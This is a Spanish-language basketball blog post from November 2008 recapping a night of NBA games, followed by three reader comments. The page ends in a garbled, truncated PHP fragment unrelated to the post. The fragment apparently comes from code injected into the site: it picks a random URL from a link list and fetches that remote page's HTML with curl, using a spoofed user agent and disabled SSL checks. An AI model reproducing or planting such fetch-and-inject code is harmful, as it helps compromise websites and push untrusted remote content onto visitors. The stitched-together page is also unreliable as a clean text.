La Crónica (14/11/2008)

15 de November de 2008 por Jabho

No se pueden considerar sopresas, pero ayer perdieron algunos de los equipos que mejor habían empezado el año y ganó alguno del que era difícil esperarlo. El tiempo irá poniendo a cada uno en su sitio, pero con alguno parece que lo está haciendo antes de lo esperado. Empezamos con el resumen:

Ya decíamos que a los Jazz no se les puede sacar de casa. Anoche nueva derrota contra los Bobcats con gran partido de Felton y Wallace, dos que en teoria no cuentan del todo para el futuro de la franquicia. Destacar que May volvió a ser titular y Koufos sigue aprovechando bien la ausencia de Okur. Más de 2000 victorias en partidos NBA juntan Sloan y Brown, que se dice pronto. Boozer jugó a su buen nivel habitual. Uno de los FA mas cotidazos del próximo veranos sin lugar a duda.

Los Sixers ganaron in extremis después de remontar 26 puntos a los Pacers. No han empezado finos en Philly y las expectativas son altas. Mucho más fácil fue sin embargo la victoria Heat sobre el farolillo rojo del Este, los WIzards. Dominio absoluto del rebote y no necesito siquiera un partido MVP de Wade.

Algo más soprendente fue la victoria de los Nets sobre unos Hawks que sólo habían perdido en acasa de los Celtics hasta ahora. Joe Johnson sigue jugando a nivel All Star y Marvin Williams parece que está dando el paso al frente que se viene esperando de él hace tiempo. Anoche sin embargo regresaba Harris trás su corta lesión y lo hizo con ganas.  Carter y el novato Brook Lopez firmaron así mismo un buen partido.

D´Antoni es sinonimo a ugar rápido y por lo que se ve, a ganar. Anoche nueva victoria de los Knicks que se ponen 6-3 algo a lo que no estan acostumbrados. En el camino D´Antoni deja cadáveres como Marbury o Curry, pero consigue revitalizar a otros que parecían perdidos para la causa.  Crawford, Richardson o Randloph parecen, son, mucho mejores de lo que parecia el año pasado. Los Thunder siguen perdiendo partidos con pocos consuelos que llevarse a la boca. Anoche el mejor del equipo fue el rookie Westbrook, que con partidos como el de anoche empieza a cumplir las expectativas generadas.

No es una sopresa, pero si que era inesperada la victoria de los Nuggets en casa del campeón. De nuevo partido serio de Melo que a lo mejor se ha dado cuenta que no hace falta tirarse las zapatillas para hacer un buen partido. Esperamos que siga así. Muy bien le ha sentado a Denver el trade de  Billups. Por los Celtics funcionó el Big Three pero lo hizo muy sólo. Rondo 7 asistencias, 7 robos pero 1 de 8 en tiro…

Derrota de los Grizzlies ante los Bucks en una noche de rookies.  Mbah a Moute se está convirtiendo por derecho propio en el robo del draft, y anoche fue decisivo para unos Bucks que siguen con la ausencia de Redd y ayer también de Villanueba. Por Memphis bien OJ Mayo, bien Marc y Gay a los suyo: 24 tiros y 0 asistencias en 37 minutos. Sin palabras.

Blazers y Hornets disputaron un partido igualado dónde se demostró que los Hornets están un pasito por delante al menos en cuanto a madurez. Sergio aprovechó los problemas de faltas de Blake y jugó un partido serio, aunque le sige faltando defensa y más agresividad en ataque. Rudy estuvo por debajo del nivel que venía mostrando. Oden firmó su primer doble y no será el último. Demostró ser una fuerza de la naturaleza y si las lesiones le respetan y puede coger el ritmo será pieza clave como se espera.

Los Magic ganaron en Dallas después de 10 años sin hacerlo. Que mal pinta lo de  Dallas…

Mejor pinta San Antonio. Anoche ganó por la minima en un mal partido a los Rockets, pero con la que le está cayendo no es mala cosa. Si se mantienen ahí hasta la vuelta de Parker y Manu habrán dado un paso importante. Mal partido de nuevo de unos Rockets que no estan cumpliendo con las expectativas generadas.

Y mucho mejor pinta el tercero de los grandes venido a menos, los Suns. Anoche sin Nash ni Barnes suspendidos por la pelea con Houston, ganaron a unos, de nuevo, incómodos Kings. Shaq volvió a ser el de sus mejores tiempos. Para los Kings, donde no jugó Kevin Martin, las mejores noticias vienen también de la zona, tanto por el experimentado Miller como por los jóvenes Thompson y Hawes.

Cierra la jornada la derrota, también inesperada, de los Lakers ante los Pistons. Venían invictos y con el record de 15 vistorias seguidas en el arranque de Houston en la cabeza. Ayer perdieron y por tanto no habrá record, pero no tiene mayor importancia. Los Pistons también han encajado bien la llegada de Iverson, bueno Hamilton quizás no tanto, y con buen balance y buenas sensaciones ahorá si son un equipo nuevo. Mal partido de los Lakers, especialmente desde la línea de 3 puntos. Por los Pistons destacó y mucho Kwame. Si jugará así mas a menudo seguro que seguiría vistiendo de purpura y oro.

Conclusiones

La llegada de buenos jugadores a Memphis como Oj Mayo, Marc o Arthur está sirviendo para que Gay tire aún más que el año pasado y asista menos (si era posible asistir aún menos). Este no es el camino de los jugadores franquicia.

Los Blazers tienen un arsenal ofensivo tremendo. Pocos equipos tiene tanto y tan variado, por fuera y por dentro. Por eso no puedo entender cómo en los partidos igualados, en el último cuarto todos o casi todos lo ataques son monotemáticos. Roy, Roy, Roy y… Roy (alguna se escapa a manos de LaMarcus). La penúltima jugada Blazer, con 3 abajo y 20 segundos ha sido toda una lección de como no hacer un ataque a menos que quieras fallarlo. Porque preparar una jugada para que se la juegue Roy con 2 tios encima y cuando quedaban al menos 10 segundos… Queda camino en Porland.

Ya decíamos que hay trades que benefician a ambos. El de Iverson y Billups parece que irá por ese camino.

Premios

MVP: Dos nombres propios por encima del resto. Harris 30 puntos, 8 asistencias y 6 rebotes. Cuban se debe estar acordando de él. Zach Randolph 29 puntos y 19 rebotes. Con la caña que le hemos dado… Ambos merecen el premio.

El Rookie: Mucha competencia por este premio habitualmente. Gran hornada. En la jornada de ayer nos quedamos con Luc Mbah a Moute y sus 19 puntos y 17 rebotes. Brook Lopez, Mayo, Marc, Oden y Westbrook también destacaron.

La Sorpresa: Kwame Brown y sus 10 puntos, 10 rebotes y 3 asistencias ante sus ex. Muy motivado jugó un partido serio. Lastima que lo haga tan de vez en cuando.

La Decepción: Mira que pinta mal lo de Dallas, pero me cuesta no premiar a T-Mac (2 de 12 en tiro nuevamente) y sus Rockets que no pudieron ante unos Spurs en cuadro. La exigencia para ellos es alta y de momento no estan cumpliendo.

El mayor esfuerzo en vano: Para Joe Johnson y sus 32 puntos, 9 rebotes y 5 asistencias. Boozer y Dallas estuvieron cerca.

Atención, pregunta: ¿Tiene solución la caida libre de Dallas o es un ciclo al que conviene acelerar su final y empezar a pensar en el futuro a medio plazo?


Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Me has quitado de la boca algunas cosas que pensaba decir de anoche… sobre todo del partido que pude ver, el de Portland.
    No me gusta nada el planteamiento con Roy, la última jugada ya fue de traca… y, de paso, no me gustaron algunos gestos que él hizo… aunque de momento dejaré el comentario de pasada hasta que confirme si es una actitud puntual o se está subiendo a la parra el chico. Me da en la nariz que se está metiendo en un camino, ya sea por si mismo o por McMillan que no le va a beneficiar nada en el futuro, con lo extraordinario jugador que es. De momento, como digo, son sólo simples sensaciones que no van más allá.
    Por Charlotte, qué bueno es Posey… va a conseguir cambiar la opinión que tenía hace no mucho de él.

    Con respecto a la derrota de Lakers… jode que fuera en casa, pero lo cierto es que perder un partido contra unos Pistons tan enchufados le puede pasar a cualquiera… de hecho ahora mismo es la jugada inmediata de los Pistons, que necesitaban un revulsivo así. Para mí es una jugada redonda, porque el riesgo es mínimo. Si les sale mal tendrán las herramientas perfectas para recostruir en junio, no como pensábamos que sería al final del año pasado.
    Los Lakers no es que jugaran especialmente mal… pero la defensa fue un coladero. Creo que fue más mérito de Detroit que otra cosa… pero ya avisamos el otro día que la victoria en New Orleans habia dejado un regustillo negativo. Los Lakers tradicionalmente han tenido un cierto toque de ir de “sobradillos” así que un toque de atención de vez en cuando no les irá mal. Hay que seguir trabajando esa defensa y esa actitud.

    Por último, con respecto a tu pregunta… la pinta de Dallas es pésima. Sólo les faltaba a ellos ahora marearse con un sistema de juego para terminar de hundirse moralmente. La cagada de este año ha sido la elección del técnico. La plantilla y sus ideas son antagónicos.

      Citar

  2. Kantonyo dice:
    #2

    Despues de el gran analisis de Jabho, poco más que decir, simplemente subrayar la aparición de dos rookies que hasta ahora no habian tenido suerte por lesiones o minutos: Greg Oden y Brook Lopez.

    El primero, ayer en su primer partido con una cierta continuidad dejo claro que si le respetan las lesiones, será el amo de la pintura en los proximos años, le falta pulirse y aprender, pero sus cualidades físicas son enormes, ayer dio la sensacion, que sin grandes alardes, puede hacer 11p-11r en un abrir y cerrar de ojos.

    Y por otra parte el ex-jugador de la Universidad de Stanford, aún teniendo claro sus limitaciones, tambien puede ser un jugador válido para los Nets, ayer 25 putos (11/17) y 9 rebotes. Decir que desapareció por completo en los minutos decisivos…

      Citar

  3. Viva_Dirk dice:
    #3

    Portland cuando jugó con Sergio-Roy-Rudy por fuera fue el mejor momento del partido para ellos, los 3 pueden dar buenos balones a los pivots, irse de su par en el 1 contra 1 y leen bien las defensas, el mayor problema fue que solo Rudy es un tirador consistente de 3.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>